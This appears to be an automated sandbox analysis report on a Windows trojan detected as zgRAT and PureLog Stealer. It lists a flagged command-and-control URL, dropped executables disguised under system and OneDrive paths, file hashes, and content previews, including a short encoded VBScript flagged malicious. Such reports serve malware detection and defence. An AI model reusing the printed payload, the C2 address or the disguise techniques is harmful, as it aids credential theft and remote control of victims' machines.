                          https://contoso.com/License0%URL Reputationsafe
                          https://contoso.com/Icon0%URL Reputationsafe
                          https://aka.ms/pscore680%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          http://91.199.45.187/eternalgameSqlflowerDownloads.phptrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.microsopowershell.exe, 00000009.00000002.2550202363.0000028365875000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.microsoft.co.powershell.exe, 0000000E.00000002.2431522493.000001FE69010000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.microsoft.powershell.exe, 0000000E.00000002.2416830415.000001FE68FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://aka.ms/pscore68powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecef_process.exe, 00000008.00000002.1540575609.000000000377F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmp, mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003686000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://91.199.45.187mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://91.199.45.187/mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.mipowershell.exe, 0000000A.00000002.2496024811.00000174636CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            91.199.45.187
                                            unknownNetherlands
                                            213325SYSHEAD-ASDEtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1533405
                                            Start date and time:2024-10-14 17:21:16 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 10m 46s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:30
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:kBY9lgRaca.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:3bfa5607ba2fdb912bf3c1b06950be30.exe
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winEXE@36/84@0/1
                                            EGA Information:
                                            • Successful, ratio: 37.5%
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 7800 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7808 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7824 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7856 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7904 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: kBY9lgRaca.exe
                                            TimeTypeDescription
                                            12:35:01API Interceptor140x Sleep call for process: powershell.exe modified
                                            No context
                                            No context
                                            No context
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\Desktop\CNRzgtSC.logd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              FMd6ntIhQY.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                jD1RqkyUNm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  ggJWCFp2S3.exeGet hashmaliciousDCRatBrowse
                                                    qM9xet97tX.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      NHd2wtJdTH.exeGet hashmaliciousDCRatBrowse
                                                        Z7q8C34yfN.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          VrKU8bWf4W.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            4NE6yDivAo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              tSht4UNfrv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):142
                                                                Entropy (8bit):5.565078109933982
                                                                Encrypted:false
                                                                SSDEEP:3:WuwKw+ht5AiLEw3nhKycOlmQg7tMQawtc+1i1IU/2pcK/CAujtswUvYy/N3m:p/DHY2nhVcOlmJtVRtc+g1IU/wcK/CAY
                                                                MD5:F3445165607EB0B0CA907FAEF0357169
                                                                SHA1:7940F27BF88B2A5575A19F8234731E68A7279346
                                                                SHA-256:D32981558A287A25502E2B82C0C639916D2DBA55E682EDBC7FDD6C978DCB4A60
                                                                SHA-512:47B2B36DB969B7C94A6200398399613B78A75C25C1782198F6FACD1239B1C8F8131E5632A76C3BC4B71DC5C1372D1FF991DF1BA24ED67DAA704DB83BDBE428C7
                                                                Malicious:false
                                                                Preview:EWXaKkPlIdkoUgXDHwoBeGmS29sqmjFf2fe5fLDoPF9882dlaMVd2Pn7uEhL2i9iXEvzCbi5s9vYGnU9fGPZOmmm1gLan2vqFbk3Goi8oZu2eO0HtipvSkUvcJ7fQHRzOFSpCa31hRvy1u
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3728384
                                                                Entropy (8bit):7.82563273886745
                                                                Encrypted:false
                                                                SSDEEP:98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
                                                                MD5:C73DF0A231280439C24218C394E0A546
                                                                SHA1:17DD69D2B9EA616CBE77FAFE23832168211C9F1A
                                                                SHA-256:A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
                                                                SHA-512:5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....*(.... ....8........0.......... ........8........E............|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z*8.... ....~....{....:B...& ....87...~....9.... ....~....{j...
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:ASCII text, with very long lines (816), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):816
                                                                Entropy (8bit):5.911213246407105
                                                                Encrypted:false
                                                                SSDEEP:24:LilHNg/T4aKVxG1MrSUBn+xkSHURRMdDwl5:6O5cYKrZx6yMdDI
                                                                MD5:08B10C2A1A855196B3E95908E06CC04B
                                                                SHA1:40176925128CB9AC26932A841F60BD184A0251F7
                                                                SHA-256:CF0BF90BD15F9C1E005C2786BF6EB44CE02D92A2E41B7633265A72253AA0ABB4
                                                                SHA-512:05D6E5FEE72BE8327CC2687970C9F7082D8B89FF43650DB324B14EB92CE8DEB0F3EA107A29F50FD62E5832938BF320A77FE21C5F127178CB9314342E2F252451
                                                                Malicious:false
                                                                Preview:vopzyX2vAV7gpxE5DAf1NFTQQWuBYAC0c5QIhVAIvamcWkbnKjHVc0kpVYicm0XASHDuh5YrAWFxc04p5H1y2rXmUkxIwhg4CmJOhrGOKaVFuwNee2hf9iHluaZ6IQ5c0LuzrpINBmocWR2hWSn3AA5eeieGRJF4e3PjCXxzuTdW4pOci1kzmCbzPQVIKC61ht7dCTf8fyJrgjjzTCiajPScbZTvCoosXmzLrvZPVlTx2uSqqfyIefSRbfBn9u51JaU4uYHimSF75ejqGnEg0gO1TiuMtwPkpcncZY6SYPfLaVV65UgVpZAnMclLo5y0DeRd0HQsrwIkADa7MxQYQ35QcAP7wundbpI6D2GyDxo3QamJBn81oZkJjBB01T67IpJV4e4UrbVcPB9CXF5JvwyBF9XC0P6u1rulQROhtoKNEH3hB8cvYxLW1HP5H2dbekkiQYvF1YZHmk77FzA2xKVEfYuJBSZ0KssdhVRnNX4AXEtQKS0S1loUPfC2olDi8i732dZuiXoZQUrbod9tcH9iEYOCSZ9mTWCyH0Xq2Gud7OD4xlNKmUF1jZyePXbJYCG4S3UyFT0WXfk0UTOrLyA9QKOsC3afolF5HJl4RZETdtdDy7J6Iu7jBGnHolvM2VrwZosKrUZwurfhqK3EteW4nf3AfePpn1aIBrnJO8OyUKzUlGaesrdX8xI4vrpNFtI2QWf9htzuQhjcqiZZDu76YDKOjtYgTBtkC7EOlb781sHaNpNMSPKUwMdMMQZxUSaOy8aseKxlx8Ep6tB3gMOD1Yyzd2CUBJniS2lOPerHbigy
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3728384
                                                                Entropy (8bit):7.82563273886745
                                                                Encrypted:false
                                                                SSDEEP:98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
                                                                MD5:C73DF0A231280439C24218C394E0A546
                                                                SHA1:17DD69D2B9EA616CBE77FAFE23832168211C9F1A
                                                                SHA-256:A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
                                                                SHA-512:5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....*(.... ....8........0.......... ........8........E............|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z*8.... ....~....{....:B...& ....87...~....9.... ....~....{j...
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:ASCII text, with very long lines (769), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):769
                                                                Entropy (8bit):5.911244960264821
                                                                Encrypted:false
                                                                SSDEEP:24:OAeJPcZoNFM/hx4qQ5jOD3oMPzffXRXwN:Ol+ZoNax0xOJXRXwN
                                                                MD5:099F1D279C83BB2D9D7F76D176CC073E
                                                                SHA1:F23E2C1FCE9E4D6F134B6EEC901BC999E66A0312
                                                                SHA-256:A431FB52177D772A1F20C969B5D9DF9CA04FCFE4FFC87FBF5C68F2F538C47F6D
                                                                SHA-512:B48062ABFBC890CD1DB0A6700D8E5C89CE804F9F8B1361F4A02E912AFE90E3F8BF9ABE627056541F765171177F77CB074F5DB0FE91B64DD3F353FE8ADDFD5246
                                                                Malicious:false
                                                                Preview:5U73RlABYzeDKtDO3XGQmoPLXVdqEjk9PXnoj9GOeOSzzH2YEiU85lIRFvf5HT7zOfyxFZo4R1vYWZWPcElgPmDnOVjydLGLQckUTFSp3ZrD0u5pYPdCrbkmbKiu00aGvkH3zC6Xw6mz5Axea4ZNsDdz283JgizD9lSQmCzWTFQvyvrbXET5aMXrHSB1Iw1OGjzUrg1YED3mwrAGRcvbO3mwNkJUA8NgNCoP5Xt0M51WSv4ZR4kqBZ9N6CGGXgXFzXYuDvL3s4PTBPdcqtDGYhfyDbS3Qmcphwh5WKWftq7GKpLqioaodQrS1krlcSnFcjvPsiFfXhXsjZnXPlUlMyMREOEvcuCbC2ol367Ai4Q529tc7TW17C3nWeKedUDmf6pruBdTnTCRhQYFflxIYLd98AOYvdhO1oa6TBr5zCNoAlGGGF92g4OTdpsuxFiKwya30bvd41SV8y9X4IRpepr7ZHcoT7IueC2LLMQpTf7pl2UppVzox2qHGcds8HK6ti155xLr2mW8rCVgwx87Hd7lWvFsshqLVB5DBYt1KHwKgrZEG76LJMyPkPjKsc8U6KmpGSeXDGx9qxFoVAlvleCINpcwzjJrJbNVEu7yciHCZyixJ4yr0NtcIecazsie7F0PjujlDxTCW9tYGpn4vb06svNkSg9uAnFT7TOYVNoD3rFIuETJEnsfP4gyh8TgxiCs3aaxbOjhxxCBpE0OMzpW4jECwZ1W4HPUoWPUngszELsc2fIcIFT83pyTVXABW
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3728384
                                                                Entropy (8bit):7.82563273886745
                                                                Encrypted:false
                                                                SSDEEP:98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
                                                                MD5:C73DF0A231280439C24218C394E0A546
                                                                SHA1:17DD69D2B9EA616CBE77FAFE23832168211C9F1A
                                                                SHA-256:A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
                                                                SHA-512:5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....*(.... ....8........0.......... ........8........E............|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z*8.... ....~....{....:B...& ....87...~....9.... ....~....{j...
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:ASCII text, with very long lines (397), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):397
                                                                Entropy (8bit):5.7957847317711835
                                                                Encrypted:false
                                                                SSDEEP:12:yeSSlKy7vf8Rks8zoQ56pyHFTGjDws1fUj:yeSSKkDrX6pylTGjDws1fUj
                                                                MD5:E3BB3C61CC839C60F14D15BAC4DCE584
                                                                SHA1:674C156BFE143313EB9E447DA4ECE6AEE51CC929
                                                                SHA-256:418525BD884D71DB20B0208E0D9C66F300296D65161C21C436CF60E04DB258E5
                                                                SHA-512:FD90269AC1B00561B477A3E2A85212A74893AEF9053E482DAA6404F6B7DF422BD419905646660F55B6728ECC31ECD61A53622815ADB54AA340E83F86B195CA58
                                                                Malicious:false
                                                                Preview:ArwURIHhX7uOxKAIqIlRm1geSeaxsV68XQM6FdCoDz9TENFcn9t2ZhvIKRBwsUzBBw1g8EDMF6Ow2NaEZ7KsmDizeDwxcQ6sA8SRWidi6gxcS9Q616XuJGZ7NBC5RPuzAfv35Js0elwFQGgewz6f2Lj3iUDUgiQqw8bwNWBsOhQiUUrHfhIcTP6z62VkFXU5UFTSotRZyNRV5BjOn6z8ZyWgCm0VBam0MUNOBZcvQtoF8k35SH7JhVfgswQB35YXkaIkyUMOdEsqKRibt4D3ddS1zqfPIb1UUQehbTH74sqdnzWbNyS82e4HHRvHz7FBNXV4wB9ZxF8uxzO9UDBUI2czVXaKiAI7noQPdbpMz2LxfKTSCvwv5v2U4giYly1x7BHJi8g2XzfQq
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3728384
                                                                Entropy (8bit):7.82563273886745
                                                                Encrypted:false
                                                                SSDEEP:98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
                                                                MD5:C73DF0A231280439C24218C394E0A546
                                                                SHA1:17DD69D2B9EA616CBE77FAFE23832168211C9F1A
                                                                SHA-256:A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
                                                                SHA-512:5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
                                                                Malicious:true
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....*(.... ....8........0.......... ........8........E............|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z*8.... ....~....{....:B...& ....87...~....9.... ....~....{j...
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:ASCII text, with very long lines (368), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):368
                                                                Entropy (8bit):5.837753117001376
                                                                Encrypted:false
                                                                SSDEEP:6:sziKBt3ma11GOQmXpG5DqvJadaNvZb0rMM1zOfdH3TbOVJDno3wNhmG5vdYFsvdc:qiat3mW1YgIVaNvZb0rj6H3n6JDowNRM
                                                                MD5:2E3C6FB7548F5E444E12BAF401F7F26B
                                                                SHA1:911A2849088E42537946FE6AF53BE0A7082C49F8
                                                                SHA-256:1C4C033D6381E7A07D655FAF7F9B8ED22B903DB6EF71D2694FC79A538DE89538
                                                                SHA-512:EB65DE1A277CF079760EFE8838187C2A4702C0244603CF17596FF24E56169B3B944E1BD29D827922373121805A55F81E8A905BB634B51843CB4CB6EFCE8A7913
                                                                Malicious:false
                                                                Preview:TzfkqGzRt1mKQRZNzyRb9i58Pfrd2hD4LJznnen1DXEctNtt78x0PPXu3gUKZWZLxr9HcvkVLZYledPCw7f3uMo5wEtGJccq82oCNmRLXcp01wQaRSYc0fblCEVXCeLs7rmlyNyJpUgRgyD9yTy0EA0cbC9JQ4J3R72KJomEdOwg9KFNAVitpUo71JKvNo2vLnAj630KruWzNTdQ7vI5VaN6T4S9d00zVAVWKgRHfYC47ythq4xcf7avZDPBk0q04hdN8HGbeBZ7YS8eLvTjCXTYkk6GQQhorLAZVgjjxV8ehcWHFv0zhGxgOFnYK9LOdvQMSiIoLtwqZy0HNzBeZsGkXdLQ3LYyKuBwMKygnLnxUHHa
                                                                Process:C:\Users\user\Desktop\kBY9lgRaca.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):221
                                                                Entropy (8bit):5.860016912730047
                                                                Encrypted:false
                                                                SSDEEP:6:G5kgwqK+NkLzWbHOurFnBaORbM5nC3vzUwxRO1:G6BMCzWLOuhBaORbQCG1
                                                                MD5:BE5DDFF739C82382BCAA23FEA71385F1
                                                                SHA1:ECD0C6DD561A1E81ADEF7D8CD2DB504F89155B4D
                                                                SHA-256:A5543AF635193AEA2FFA449EE70D9FAC5AAAFE4F880287E9905380B5949969E5
                                                                SHA-512:1E108A7DAC6F6772DB919EAEDEA876846E50787030C84752F08396B6A728299C2CB9156DED22D7FACC1952A2BA2C1667552F5C07FE53002BA1708856CFC85138
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                Preview:#@~^xAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z]!xDk:.f^szJ+.*xhnLKs!.2N\GCbzqoM..(5sO/"90mc8lDJS~Z~PWC^/nRT4AAA==^#~@.
                                                                Process:C:\Users\user\Desktop\kBY9lgRaca.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3728384
                                                                Entropy (8bit):7.82563273886745
                                                                Encrypted:false
                                                                SSDEEP:98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
                                                                MD5:C73DF0A231280439C24218C394E0A546
                                                                SHA1:17DD69D2B9EA616CBE77FAFE23832168211C9F1A
                                                                SHA-256:A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
                                                                SHA-512:5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
